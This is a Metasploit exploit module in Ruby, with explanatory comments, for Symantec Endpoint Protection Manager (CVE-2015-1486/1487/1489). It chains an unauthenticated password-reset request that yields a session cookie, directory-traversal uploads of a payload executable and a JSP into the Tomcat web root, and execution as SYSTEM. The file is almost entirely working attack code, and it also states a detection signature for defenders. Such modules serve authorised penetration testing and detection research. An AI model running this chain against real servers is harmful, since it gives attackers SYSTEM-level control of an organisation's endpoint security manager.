##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
  # Remote exploit module for Symantec Endpoint Protection Manager. It chains
  # three steps against the same ConsoleServlet endpoint: a ResetPassword POST
  # that is sent without credentials and whose response cookie is reused as the
  # session, a BinaryFile/UploadPackage POST whose PackageFile parameter carries
  # "../" traversal so the upload lands under tomcat/webapps/ROOT, and an
  # uploaded JSP that hands the dropped executable to SemLaunchService.
  # SSL defaults to true, so all of this travels over HTTPS to RPORT 8443.
  #
  # Defensive note: that request sequence is itself a usable detection
  # signature -- ActionType=ResetPassword followed by
  # ActionType=BinaryFile&Action=UploadPackage with traversal sequences in
  # PackageFile, then a GET for a newly created .jsp in the ROOT web app.
  Rank = ExcellentRanking
  include Msf::Exploit::FileDropper          # register_file_for_cleanup
  include Msf::Exploit::Remote::HttpClient   # send_request_cgi, normalize_uri, peer

  # Registers module metadata and options.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  # @return [void]
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
      'Description' => %q{
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
include an authentication bypass, a directory traversal and a privilege escalation to
get privileged code execution.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Markus Wulftange', #discovery
          'bperry' # metasploit module
        ],
      'References' =>
        [
          ['CVE', '2015-1486'],
          ['CVE', '2015-1487'],
          ['CVE', '2015-1489'],
          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
        ],
      # Management console is served over TLS; the client defaults to it.
      'DefaultOptions' => {
        'SSL' => true
      },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_X86,
              'Payload' => {
                'DisableNops' => true
              }
            }
          ],
        ],
      # Execution happens through a service running as SYSTEM (see Description).
      'Privileged' => true,
      'DisclosureDate' => 'Jul 31 2015',
      'DefaultTarget' => 0))
    register_options(
      [
        Opt::RPORT(8443),
        OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
      ], self.class)
  end

  # Runs the chain: obtain a cookie, upload the payload executable, upload a
  # JSP that launches it, then request that JSP.
  #
  # Every upload step requires an HTTP 200; otherwise fail_with(Failure::Unknown)
  # aborts the module. The first step additionally requires at least one cookie.
  #
  # @return [void]
  def exploit
    # Random basenames for the dropped .exe and .jsp; both end up under
    # tomcat/webapps/ROOT on the target.
    meterp = Rex::Text.rand_text_alpha(10)
    jsp = Rex::Text.rand_text_alpha(10)

    print_status("#{peer} - Getting cookie...")
    # Step 1: a ResetPassword POST with no credentials. Only the Set-Cookie
    # value from the response is used afterwards.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_post' => {
        'ActionType' => 'ResetPassword',
        'UserID' => 'admin',
        'Domain' => ''
      }
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
    end
    cookie = res.get_cookies
    if cookie.nil? || cookie.empty?
      fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
    end

    # JSP source uploaded in step 3. It calls SemLaunchService.execute with the
    # "CommonCMD" command and a path built from the JVM's user.dir plus
    # ..\webapps\ROOT\<meterp>.exe (each "\\\\" in this %Q literal becomes "\\"
    # in the JSP, i.e. one escaped backslash in the Java string). The literal
    # must stay at column 0: leading whitespace would become part of the page.
    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}

    print_status("#{peer} - Uploading payload...")
    # Step 2: UploadPackage writes the request body to PackageFile; the
    # "../../../" prefix is the directory traversal that redirects it into the
    # ROOT web application. The cookie from step 1 is the only session state.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
        'KnownHosts' => '.'
      },
      'data' => payload.encoded_exe,
      'cookie' => cookie,
      'ctype' => ''
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end
    # NOTE(review): the cleanup path is "../tomcat/..." while the upload used
    # "../../../tomcat/..." -- presumably relative to different bases; confirm
    # the cleanup actually removes the file (the status message before the
    # final request already warns that manual cleanup is required).
    register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")

    print_status("#{peer} - Uploading JSP page to execute the payload...")
    # Step 3: same traversal upload, this time with the JSP source as the body.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
        'KnownHosts' => '.'
      },
      'data' => exec,
      'cookie' => cookie,
      'ctype' => ''
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end
    register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")

    print_status("#{peer} - Executing payload. Manual cleanup will be required.")
    # Step 4: requesting the JSP runs it. The response is not inspected; the
    # second argument is a 5 second timeout so the module does not block on a
    # page that never finishes rendering.
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
    }, 5)
  end
end